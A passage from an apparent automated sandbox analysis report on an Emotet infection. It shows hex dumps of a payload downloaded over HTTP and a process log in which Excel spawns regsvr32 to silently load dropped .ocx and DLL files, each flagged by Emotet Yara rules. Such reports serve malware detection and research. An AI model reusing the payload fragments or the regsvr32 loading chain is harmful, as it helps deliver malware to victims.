c1 48 39 05 81 85 01 00 73 0e 48 8b 05 78 85 01 00 48 89 44 24 68 eb 1b 8b 44 24 30 ff c0 48 98 48 8b 8c 24 98 00 00
                                                    Data Ascii: D$`D$@|$@u.HJHD$ E3ABHIu3|$@u>"HD$ ABLxIHKHJJH$H$D$0HH;$spD$0HH$H+HH9sHxHD$hD$0HH$
                                                    2022-05-23 07:19:25 UTC446INData Raw: 74 15 48 83 bc 24 a8 00 00 00 00 76 0a c7 44 24 50 01 00 00 00 eb 08 c7 44 24 50 00 00 00 00 8b 44 24 50 89 44 24 40 83 7c 24 40 00 75 2e 48 8d 05 8c ed 00 00 48 89 44 24 20 45 33 c9 41 b8 12 00 00 00 48 8d 15 67 0d 01 00 b9 02 00 00 00 e8 7d 49 ff ff 83 f8 01 75 03 cc 33 c0 83 7c 24 40 00 75 3e e8 e9 40 ff ff c7 00 16 00 00 00 48 c7 44 24 20 00 00 00 00 41 b9 12 00 00 00 4c 8d 05 2d 0d 01 00 48 8d 15 26 10 01 00 48 8d 0d 2f ed 00 00 e8 fa 52 ff ff b8 16 00 00 00 e9 1a 05 00 00 48 83 bc 24 b0 00 00 00 00 0f 85 1d 01 00 00 48 8b 84 24 a0 00 00 00 c6 00 00 48 83 bc 24 a8 00 00 00 ff 74 68 48 81 bc 24 a8 00 00 00 ff ff ff 7f 74 5a 48 83 bc 24 a8 00 00 00 01 76 4f 48 8b 84 24 a8 00 00 00 48 ff c8 48 39 05 70 45 01 00 73 0e 48 8b 05 67 45 01 00 48 89 44 24 58
                                                    Data Ascii: tH$vD$PD$PD$PD$@|$@u.HHD$ E3AHg}Iu3|$@u>@HD$ AL-H&H/RH$H$H$thH$tZH$vOH$HH9pEsHgEHD$X
                                                    2022-05-23 07:19:25 UTC462INData Raw: 24 40 2b c8 8b c1 48 8b 8c 24 70 3d 00 00 48 33 cc e8 8b 88 fe ff 48 81 c4 88 3d 00 00 c3 cc cc cc 48 89 4c 24 08 48 83 ec 48 48 83 7c 24 50 00 75 2e 48 8d 05 b8 c6 00 00 48 89 44 24 20 45 33 c9 41 b8 2e 00 00 00 48 8d 15 b3 d7 00 00 b9 02 00 00 00 e8 79 09 ff ff 83 f8 01 75 03 cc 33 c0 8b 05 1f 2a 01 00 ff c0 89 05 17 2a 01 00 48 8b 44 24 50 48 89 44 24 30 41 b9 3a 00 00 00 4c 8d 05 44 d7 00 00 ba 02 00 00 00 b9 00 10 00 00 e8 1d 98 fe ff 48 89 44 24 38 48 8b 44 24 30 48 8b 4c 24 38 48 89 48 10 48 83 7c 24 38 00 74 21 48 8b 44 24 30 8b 40 18 83 c8 08 48 8b 4c 24 30 89 41 18 48 8b 44 24 30 c7 40 24 00 10 00 00 eb 31 48 8b 44 24 30 8b 40 18 83 c8 04 48 8b 4c 24 30 89 41 18 48 8b 44 24 30 48 83 c0 20 48 8b 4c 24 30 48 89 41 10 48 8b 44 24 30 c7 40 24 02 00
                                                    Data Ascii: $@+H$p=H3H=HL$HHH|$Pu.HHD$ E3A.Hyu3**HD$PHD$0A:LDHD$8HD$0HL$8HHH|$8t!HD$0@HL$0AHD$0@$1HD$0@HL$0AHD$0H HL$0HAHD$0@$
                                                    2022-05-23 07:19:25 UTC478INData Raw: 44 24 40 48 ff c0 48 89 44 24 40 8b 44 24 50 25 00 02 00 00 85 c0 74 33 83 7c 24 68 00 74 0d 48 8b 44 24 40 0f be 00 83 f8 30 74 1f 48 8b 44 24 40 48 ff c8 48 89 44 24 40 48 8b 44 24 40 c6 00 30 8b 44 24 68 ff c0 89 44 24 68 83 7c 24 6c 00 0f 85 47 02 00 00 8b 44 24 50 83 e0 40 85 c0 74 5d 8b 44 24 50 25 00 01 00 00 85 c0 74 14 b8 2d 00 00 00 66 89 44 24 54 c7 44 24 5c 01 00 00 00 eb 3c 8b 44 24 50 83 e0 01 85 c0 74 14 b8 2b 00 00 00 66 89 44 24 54 c7 44 24 5c 01 00 00 00 eb 1d 8b 44 24 50 83 e0 02 85 c0 74 12 b8 20 00 00 00 66 89 44 24 54 c7 44 24 5c 01 00 00 00 8b 44 24 68 8b 4c 24 58 2b c8 8b c1 2b 44 24 5c 89 84 24 28 05 00 00 8b 44 24 50 83 e0 0c 85 c0 75 20 4c 8d 8c 24 b0 04 00 00 4c 8b 84 24 00 06 00 00 8b 94 24 28 05 00 00 66 b9 20 00 e8 e1 03 00
                                                    Data Ascii: D$@HHD$@D$P%t3|$htHD$@0tHD$@HHD$@HD$@0D$hD$h|$lGD$P@t]D$P%t-fD$TD$\<D$Pt+fD$TD$\D$Pt fD$TD$\D$hL$X++D$\$(D$Pu L$L$$(f
                                                    2022-05-23 07:19:25 UTC494INData Raw: 00 05 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 1d 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 96 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 8d 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 8e 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 8f 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 90 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 91 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 92 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 93 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 b4 02 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 b5 02 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 09 00 00 00 c0 00 00 00 0c 00 00 00 66 3a 5c 64 64 5c 76 63 74 6f 6f 6c 73 5c 63 72 74 5f 62 6c 64 5c 73 65 6c 66 5f 36 34 5f 61 6d 64 36 34 5c 63 72 74 5c 73 72 63 5c 6d 6c
                                                    Data Ascii: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ml
                                                    2022-05-23 07:19:25 UTC510INData Raw: 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 00 3d 00 00 00 00 00 00 00 5f 00 73 00 65 00 74 00 5f 00 65 00 72 00 72 00 6f 00 72 00 5f 00 6d 00 6f 00 64 00 65 00 00 00 00 00 00 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 6c 00 73 00 5c 00 63 00 72 00 74 00 5f 00 62 00 6c 00 64 00 5c 00 73 00 65 00 6c 00 66 00 5f 00 36 00 34 00 5f 00 61 00 6d 00 64 00 36 00 34 00 5c 00 63 00 72 00 74 00 5c 00 73 00 72 00 63 00 5c 00 65 00 72 00 72 00 6d 00 6f 00 64 00 65 00 2e 00 63 00 00 00 00 00 00 00 28 00 22 00 49 00 6e 00 76 00 61 00 6c 00 69 00 64 00 20 00 65 00 72 00 72 00 6f 00 72 00 5f 00 6d 00 6f 00 64 00 65 00 22 00 2c 00 20 00 30 00 29 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii: `abcdefghijklmnopqrstuvwxyz{|}~=_set_error_modef:\dd\vctools\crt_bld\self_64_amd64\crt\src\errmode.c("Invalid error_mode", 0)
                                                    2022-05-23 07:19:25 UTC526INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 00 00 00 00 00 00 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 00 00 00
                                                    Data Ascii: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
                                                    2022-05-23 07:19:25 UTC542INData Raw: 71 a0 9a b6 41 18 21 1c ea e3 ae 65 f1 68 71 7d 2f a0 2c 24 0e ba 3f 4e 16 c3 70 69 7d 9e 49 b1 25 5f 38 e2 9c 18 a0 a4 62 6b 8b 66 ed 9a 1d 47 f6 3e 78 ed 3c 65 21 9d 08 f7 a7 0c 70 2b c8 b1 7c 81 85 21 0f 1c 49 66 a2 6a a4 2d de bb 6c d8 3d 61 62 53 c0 3c dd ac 2e 7a 00 cd a5 23 76 de 0f c8 9b 37 e8 2c 74 63 f1 7a 2f d1 ab 12 7e 19 0d 8d 23 da f2 35 4e 36 a3 58 4c 67 f9 1e 47 13 54 30 d0 f6 e4 43 11 6c a8 7d f3 ce a2 65 5e 64 02 d3 5b 2b e3 4c 6a 71 9c 8b e6 89 e2 7c 04 b7 8c 45 ad 0b 5d 29 99 34 0f 2f 22 e9 3c 0e 26 9f 59 1e 35 b1 07 11 3d 52 b3 da 45 b3 03 5c 26 6b c2 16 10 3a e1 bc ea b7 fb 21 40 2f c2 16 b7 7a a5 11 1d 2f 70 85 00 4e ba 27 4e 1a bf dd 8c db 72 ef 14 00 1b f8 1d 7c 14 fe 4a 2f 68 c3 6e 42 1e da 28 11 3a c8 71 55 2a ed 1c 61 22 23 f3
                                                    Data Ascii: qA!ehq}/,$?Npi}I%_8bkfG>x<e!p+|!Ifj-l=abS<.z#v7,tcz/~#5N6XLgGT0Cl}e^d[+Ljq|E])4/"<&Y5=RE\&k:!@/z/pN'Nr|J/hnB(:qU*a"#
                                                    2022-05-23 07:19:25 UTC558INData Raw: 35 3c a2 20 4f 53 00 02 59 24 d4 4d 4f 1f 2e fe 09 9c ea 2e 7a 7c b9 eb 31 76 e7 34 00 6b 75 55 31 fd ec ea 22 6a 48 2a fb 7f 37 6c be fb 4b 37 71 6a 91 b9 84 98 61 f1 ff 6b 41 62 34 f7 ea 6d 35 35 3c be 73 2c 2f a4 84 72 26 55 39 67 aa dd 08 4c 31 6b df 71 39 5a c6 b4 7e 64 40 24 d4 3d 4d 6c db 6f 4b 1a e3 1c 0e 5e b2 23 24 35 76 0b be a9 22 e5 a0 ba 7d e3 2a 94 9c bc da 8d 21 56 65 de 89 c1 9a 9b 23 ee 19 05 22 9c 87 78 62 2b 81 ad b3 ce 94 ad 1a 6c 0c 52 62 71 66 0c a9 12 d9 21 d3 9b aa 2b 0e 58 cd 09 66 5a 90 08 11 46 48 b4 05 4e 56 f7 54 c5 5c bf ef 6b 41 62 34 2c 52 bd 37 b4 b9 6d 66 6b 67 1f 21 85 db d4 8c 63 29 68 00 32 ba 35 cc df fd 34 4f 31 76 0c 9b a7 f9 be 2d 7c 64 d6 68 0e 68 c9 66 42 6e 73 ce e6 0d c2 41 55 5e 84 1e b3 09 ec 3c 4e 57 07 e9
                                                    Data Ascii: 5< OSY$MO..z|1v4kuU1"jH*7lK7qjakAb4m55<s,/r&U9gL1kq9Z~d@$=MloK^#$5v"}*!Ve#"xb+lRbqf!+XfZFHNVT\kAb4,R7mfkg!c)h254O1v-|dhhfBnsAU^<NW
                                                    2022-05-23 07:19:25 UTC574INData Raw: 5f 26 92 c1 3e 0f 97 78 ba c3 2c 03 8c 70 aa 82 58 0c b5 09 15 42 27 f8 b0 82 d3 33 d9 24 0f 5b d1 9f 89 af e7 2e 75 58 ea e5 81 b0 fa 2e 42 6c ce 36 43 48 82 9f f4 63 34 3e d6 60 4e 2a 3e 65 2c e0 ac 2d a2 be 74 0e 71 94 cb a4 cc 06 b2 87 22 99 0c 18 7d 16 b3 6b 40 e3 1b 5d 5d 42 46 2c 6f ed 2c 6c 12 5b 5f 5e 6c f2 32 67 6d c1 45 0b 58 fd d1 53 46 58 e2 0f 46 6c 4c da 4b 9f b4 78 41 3c c4 c1 9a de f1 68 71 61 9c ca 43 ca 9f d8 68 a0 9f a1 3a c4 7d 52 3e c1 50 7b 21 6d a1 c4 2a a8 6e 4c 20 71 bd 0b 51 ad 59 52 2b 25 f0 1e 42 30 a3 45 6f 78 ad 27 67 02 ff 06 d9 65 f6 51 18 05 6d ea 13 41 41 0c 24 bc 35 ac 6f 4c 50 9f af fc 6a 35 0c 18 1d 22 ff 22 64 74 de 35 4d 08 af 94 65 c1 e9 3c 0e 36 fc fe 28 de fd 07 11 21 2e ed 14 61 12 23 f3 2e 47 2b 2a bf 63 57 7b
                                                    Data Ascii: _&>x,pXB'3$[.uX.Bl6CHc4>`N*>e,-tq"}k@]]BF,o,l[_^l2gmEXSFXFlLKxA<hqaCh:}R>P{!m*nL qQYR+%B0Eox'geQmAA$5oLPj5""dt5Me<6(!.a#.G+*cW{
                                                    2022-05-23 07:19:25 UTC590INData Raw: bd a1 e5 3a 6b 2b e6 7b 83 31 ea df ee 4b 3c 4d c8 ed 7e 7d e5 f2 c9 6a 58 50 2f ee af d8 4b 2a 66 36 d2 93 ca f7 f6 85 72 6a 66 b0 b1 af 64 bf ef ab 40 62 34 ed ff 23 37 f4 99 ad 67 6b 67 6e e0 df ec 56 39 6b 24 e9 b5 86 32 6b 6a 49 16 30 21 f6 f3 de 43 24 5f 84 b4 1d 50 aa da 92 6b 48 2a 15 4b 01 fd be fb fb 36 71 6a 91 b9 84 98 65 f1 ff db 40 62 34 f7 da dd 34 35 3c 93 28 6b 67 e4 94 c2 27 55 39 1f 32 4f 18 c5 b4 d3 69 5e 48 b5 09 15 46 22 c9 60 7b 51 2d d3 d5 e3 6c 2a 68 c3 bf d6 59 51 6c be 3a 67 61 39 e7 e3 28 44 72 67 30 e3 27 67 42 dc 2c d4 65 37 be b1 a5 67 6b 67 5e e0 75 a0 91 ce 94 d4 d3 a9 47 38 6b eb a5 e1 35 44 31 79 e3 f5 d3 a0 86 e2 9f 18 aa ab a2 6c 48 2a 39 04 0a 31 f6 ba 0f be ad 23 ef 03 4d 3b ee 13 7a 2a ca 11 2c 21 17 e6 db 55 b7 e1
                                                    Data Ascii: :k+{1K<M~}jXP/K*f6rjfd@b4#7gkgnV9k$2kjI0!C$_PkH*K6qje@b445<(kg'U92Oi^HF"`{Q-l*hYQl:ga9(Drg0'gB,e7gkg^uG8k5D1ylH*91#M;z*,!U
                                                    2022-05-23 07:19:25 UTC606INData Raw: 26 4b 9b f9 bd c8 e0 27 3e bf dd 66 fb a7 8f 43 ee 9e 90 6f d1 1d 4b ee 5f 08 93 45 4c 58 da 39 55 fd 0e 6d 98 98 9c a7 ba b5 22 10 d6 78 ae 62 5f 33 37 2a be 70 54 a4 01 03 61 e4 54 12 08 95 d1 21 ec 2d 88 88 17 28 6a 35 0d b4 34 b8 33 ee c1 51 d7 6b 5b e2 4f ec 2a 4a 06 56 4e 66 db 1c 0c 96 9c 98 fb 1a 2f 06 1c cc 37 07 c0 25 8f 87 2c b5 03 3f f0 70 c4 c7 a2 21 33 ee d3 a5 7a e5 38 61 60 a0 25 58 b9 d0 aa 80 5b c1 69 15 b0 03 3e a7 ec 55 79 e2 1d 08 a0 2a 4a e3 0d a2 ed 1f 39 24 be 73 22 ab 70 6a ed d0 e5 72 67 78 82 e1 22 63 34 3e d4 ad 7f be 39 29 fa 6a 67 2d a8 f2 bc 55 39 6b 63 9f d9 55 c7 ea 8c f1 e0 37 4d 70 75 92 a9 ab a9 86 96 9f 15 4b 23 ea 24 48 eb 03 3a 59 ed 40 16 10 57 bb 26 a1 1d 1d 38 68 94 6a e2 06 3a 05 fb 5f 65 b6 40 64 c4 10 8e 67 ee
                                                    Data Ascii: &K'>fCoK_ELX9Um"xb_37*pTaT!-(j543Qk[O*JVNf/7%,?p!3z8a`%X[i>Uy*J9$s"pjrgx"c4>9)jg-U9kcU7MpuK#$H:Y@W&8hj:_e@dg
                                                    2022-05-23 07:19:25 UTC622INData Raw: 2a 55 5c 6a df 0d 9b aa cf 89 99 c1 51 f8 75 bd 6d 50 6f e4 67 cf c3 67 19 b2 62 5f 34 76 fb d5 eb 60 66 b1 63 8d 98 87 ad 26 3c 22 d4 f0 5f a4 52 4a 3f e4 11 14 15 81 1b 7e af 10 46 83 34 98 fe b1 f6 2e 15 d0 21 2b 4d ba 3b 19 08 af 87 c1 d6 64 e6 09 98 cb a9 a2 2e de f9 da 42 8f ff 16 4a b0 07 19 51 c4 37 18 5b a7 63 43 e3 41 09 1b f8 3e 35 fb 20 c3 c1 8f 89 21 f1 69 f2 ce 8a ea 82 03 c7 64 cc eb 2b ef 23 76 23 76 ed 05 83 d4 3c 16 b0 22 3a 6e 2a af 0d 81 50 89 10 6c 71 fd 83 7d f8 16 42 10 ce 3f cc c0 b1 e2 fa 14 c3 97 9e 8f 32 bc 69 ce e5 1e cc c9 59 71 24 92 7c c4 9f 1e 5d 4e b0 2e c5 3d 68 c3 b2 b0 03 c9 3d 81 0a 79 ae 1d e3 e9 1d f6 68 c9 5f d5 0e 8e d5 7a f7 36 86 1d 9b 04 17 82 37 c0 6a 56 18 43 e3 71 d1 d3 61 c8 ca bd 10 c3 2e 33 1f 21 bd 61 2a
                                                    Data Ascii: *U\jQumPoggb_4v`fc&<"_RJ?~F4.!+M;d.BJQ7[cCA>5 !id+#v#v<":n*Plq}B?2iYq$|]N.=h=yh_z67jVCqa.3!a*
                                                    2022-05-23 07:19:25 UTC638INData Raw: 5e c8 3b 8a 74 9e 8a 95 e3 5f b8 04 b0 5e aa 1a c2 77 4b 2a 66 9d 14 88 fa d3 87 35 b0 07 82 5c c4 37 83 02 da 63 43 e3 41 92 86 fb 3d 35 fb 20 84 32 24 f2 21 bb 41 b5 3b aa 46 88 0f 8f 54 8b 66 df 3d dc 2c 39 37 66 87 61 af 1f 2d eb 50 aa 22 da 00 ad 96 c9 db 24 9c 68 92 f7 9a b6 2f 8a b9 64 9e 67 13 2f 8f 08 eb 71 9a e7 be 7c 5d 13 e4 11 87 fc 9b 08 3f e3 10 11 c7 4e 94 00 c5 7c 43 9d bf 63 f6 9c d8 75 ac 81 cd 59 f0 24 70 d1 6e 47 9e 40 48 2a e7 1f 79 39 a2 89 bc b4 04 42 07 78 41 72 23 f3 2f 43 c8 27 dc ff 1b 41 77 be 79 4d ed 2f 43 5d 69 f7 21 21 0b 6b 2b 20 89 0a 15 5b e1 1b a4 78 c6 7c 86 ed 15 c4 d4 34 8d d1 14 0f 47 c2 89 24 d5 99 12 d8 2f 6d 3e c6 f5 7e ef cb 58 45 72 df e3 40 6e 43 5f c4 16 55 65 38 b1 a1 65 64 6b 8e d8 dd 85 db 92 7c 8b 6c ff
                                                    Data Ascii: ^;t_^wK*f5\7cCA=5 2$!A;FTf=,97fa-P"$h/dg/q|]?N|CcuY$pnG@H*y9BxAr#/C'AwyM/C]i!!k+ [x|4G$/m>~XEr@nC_Ue8edk|l
                                                    2022-05-23 07:19:25 UTC654INData Raw: 81 75 66 40 c1 8c db 69 d3 d5 9b 6c 2a 68 89 ca 65 d3 d4 dc 36 76 43 f4 dc da 65 58 45 62 e6 cd da 60 43 62 ec 7f 56 65 bc b0 8c 66 64 6b ec e0 99 79 24 55 d1 2b fb 97 ff 89 b4 ab 69 5e 48 e9 97 9e 76 2e cb fc e7 36 85 9c 1e a0 e2 ea 6b 48 2a 91 bb 90 86 36 ff d6 f5 72 6a 66 99 e8 b2 64 78 6a 67 c2 d7 f4 75 5f 65 a6 6c 69 51 e5 de a7 66 21 7a 51 2d 61 5f ec ed c8 4d 31 6b 42 5f 45 3c cc 84 be 65 40 24 63 2d 10 d3 d1 ae a7 29 68 48 dd f1 5a 51 ed 80 be 40 35 71 67 30 26 ce b5 e2 c0 69 63 43 b7 f0 74 5f a4 92 8d 3f 65 64 63 0c e0 99 79 24 55 27 e2 ae d0 03 4e 31 d3 55 9b 6d 7f c6 bc ce 65 40 24 a8 98 21 d5 1c 0f 1f 62 e1 04 0e 2e 9b bb 68 7d fd 88 bc e4 d2 65 58 45 f3 d2 c0 69 63 43 25 7e 29 5e a2 73 11 6c 89 52 42 67 a4 4d 5e 74 5c b8 1f 0f 38 3b ce 37 6b
                                                    Data Ascii: uf@il*he6vCeXEb`CbVefdky$U+i^Hv.6kH*6rjfdxjgu_eliQf!zQ-a_M1kB_E<e@$c-)hHZQ@5qg0&icCt_?edcy$U'N1Ume@$!b.h}eXEicC%~)^slRBgM^t\8;7k
                                                    2022-05-23 07:19:25 UTC670INData Raw: af 13 5d 49 af b1 fa 85 a3 3c 6c 0a e7 16 75 4c 80 05 f8 03 f0 1e 42 78 a5 3f d6 4e e1 27 67 42 bd 32 7b 45 7f b6 f8 7d a7 23 ec a1 69 f3 7c 5d 71 e2 43 78 48 c7 41 73 3d 16 cb d0 2d 79 f5 06 a0 24 d4 cd 4d e8 50 2b 6f 62 e3 e4 0e f6 5a 51 6c bc 06 9b be f5 4e ce 58 45 72 2e f3 b3 ea 07 46 0c fd db 41 97 35 3c 65 2c e0 9e ec 65 5e 14 de bd 4f b3 68 00 4e b8 2f 4e 76 00 b5 21 15 56 8e ac e8 a0 86 5a 98 97 6f 4b 72 1b 58 2b 66 d3 15 48 69 3e c8 30 56 cb 66 58 0d f7 a7 0d 11 a4 07 46 64 e6 a1 48 37 74 84 da 34 76 80 a4 4d 5e 74 5c b8 1f 0f 38 9e 43 33 6b ad da 6c 84 4d 31 76 17 58 fd 5f f2 ed 7c e8 2b 6f 2a e5 44 6a a7 bb 53 e5 b9 52 fb 35 71 6a df e6 c5 2c ff 13 ee 47 fb 62 34 76 73 ec b3 11 84 65 64 6b e6 e1 05 c2 24 55 39 1c e8 97 ff cf 85 4f d2 5e 48 3c
                                                    Data Ascii: ]I<luLBx?N'gB2{E}#i|]qCxHAs=-y$MP+obZQlNXEr.FA5<e,e^OhN/Nv!VZoKrX+fHi>0VfXFdH7t4vM^t\8C3klM1vX_|+o*DjSR5qj,Gb4vsedk$U9O^H<
                                                    2022-05-23 07:19:26 UTC686INData Raw: 52 50 2b ee 9f 20 42 2a 66 8a d2 29 35 fd c6 7d 7b 6a 66 b0 58 74 98 87 22 e8 fe 2a 3e 76 5f 2d bc c5 79 56 a4 ea 9c 1f 7d 71 24 5a b6 b2 2c 68 00 41 b5 b0 6c 5e 48 bd b6 0e a7 66 40 2b db 5b 6c 58 50 aa 94 56 84 49 2a 69 de 6f 6e 35 76 c2 ce fc c7 65 58 4a f6 ad 79 6a 63 c2 99 3a 2a 5a 65 38 b1 77 64 64 6b e6 9e 63 a6 2c 55 36 ee 08 66 00 4e f6 2f 4e 2e eb d4 02 31 ce ab 8c e8 93 be 2d 7c 10 2a 6f 2a 68 c9 66 42 2a 43 ee a8 7e 0f bc 35 4e 5e d9 01 56 17 a9 d2 63 43 e3 40 52 2f e1 94 d5 34 a2 e1 3b 6d 65 21 f8 cd 1a 39 ea 9e 38 0a 4e 31 cd b5 81 e3 b7 c0 61 7c 66 40 d3 be b8 83 5a d9 be 3f 20 68 48 eb cb 0a 5b 6c 35 78 c2 80 21 60 66 58 a3 c4 65 78 ad 27 67 16 70 36 39 65 b6 71 18 11 49 7a 67 65 a0 0e 00 21 63 33 45 68 c7 cb 79 61 6a 5e 8c d4 a1 31 1d e3
                                                    Data Ascii: RP+ B*f)5}{jfXt"*>v_-yV}q$Z,hAl^Hf@+[lXPVI*ion5veXJyjc:*Ze8wddkc,U6fN/N.1-|*o*hfB*C~5N^VcC@R/4;me!98N1a|f@Z? hH[l5x!`fXex'gp69eqIzge!c3Ehyaj^1
                                                    2022-05-23 07:19:26 UTC702INData Raw: 5f 17 6d 4b f9 17 da 29 4a ff 07 11 59 e1 23 97 01 f9 2a b3 e1 35 03 e9 79 b1 d6 21 13 15 d4 f7 6c 95 98 dd 1f 0b 29 55 d0 67 d5 97 ff 89 74 a0 8b ca 70 3c 05 bc 20 7e 0c a9 12 9e e8 1d 9b ef de d5 97 c9 67 ad d9 0d d4 50 f7 36 fe 36 5b d3 3d 82 37 a0 db b4 c8 43 a3 51 b1 5a 0e 72 f2 4e ec 21 ac e6 10 e6 9b 06 7d a8 ac 6e 17 bf 7d 1f 6b eb 1b 37 60 fd 31 76 a7 2d 5b 56 f8 2c 27 ba 12 6f 2a e9 3d 55 01 f9 52 6c be 33 3c 71 fa 2f a1 d3 08 b9 ee 3c 4e 43 ab e2 ae 88 a0 dd 37 10 39 65 8d f9 9a 9a de bd 61 92 f6 f7 eb 68 b8 51 43 32 5b 12 c5 79 aa ba 3b a1 b7 c5 9e 93 6d d1 05 ec ee 5f af b3 b8 68 5a 96 29 fe ea ce 36 71 eb 23 93 78 ee 67 78 eb 2e 88 63 cb b2 47 e4 72 fe 8f b2 64 6b e6 10 ea 3d 82 92 21 ac 6e a7 74 a9 82 6b eb 13 87 a0 37 29 da e7 35 eb a5 c6
                                                    Data Ascii: _mK)JY#*5y!l)Ugtp< ~gP66[=7CQZrN!}n}k7`1v-[V,'o*=URl3<q/<NC79eahQC2[y;m_hZ)6q#xgx.cGrdk=!ntk7)5


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:09:18:18
                                                    Start date:23/05/2022
                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                    Imagebase:0x13fce0000
                                                    File size:28253536 bytes
                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Target ID:3
                                                    Start time:09:18:29
                                                    Start date:23/05/2022
                                                    Path:C:\Windows\System32\regsvr32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx
                                                    Imagebase:0xfff60000
                                                    File size:19456 bytes
                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.935688692.0000000000150000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high

                                                    General

                                                    Target ID:4
                                                    Start time:09:18:31
                                                    Start date:23/05/2022
                                                    Path:C:\Windows\System32\regsvr32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ITAzDMJQNXvQb\pSYwk.dll"
                                                    Imagebase:0xfff60000
                                                    File size:19456 bytes
                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.1240660919.00000000002E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high

                                                    General

                                                    Target ID:5
                                                    Start time:09:18:33
                                                    Start date:23/05/2022
                                                    Path:C:\Windows\System32\regsvr32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx
                                                    Imagebase:0xfff60000
                                                    File size:19456 bytes
                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.943959485.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.943507589.00000000002F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high

                                                    General

                                                    Target ID:6
                                                    Start time:09:18:36
                                                    Start date:23/05/2022
                                                    Path:C:\Windows\System32\regsvr32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MTAKuNEHAAsvRsb\hgVDSaDXChbCzdU.dll"
                                                    Imagebase:0xfff60000
                                                    File size:19456 bytes
                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.1240847022.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.1241152796.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high

                                                    General

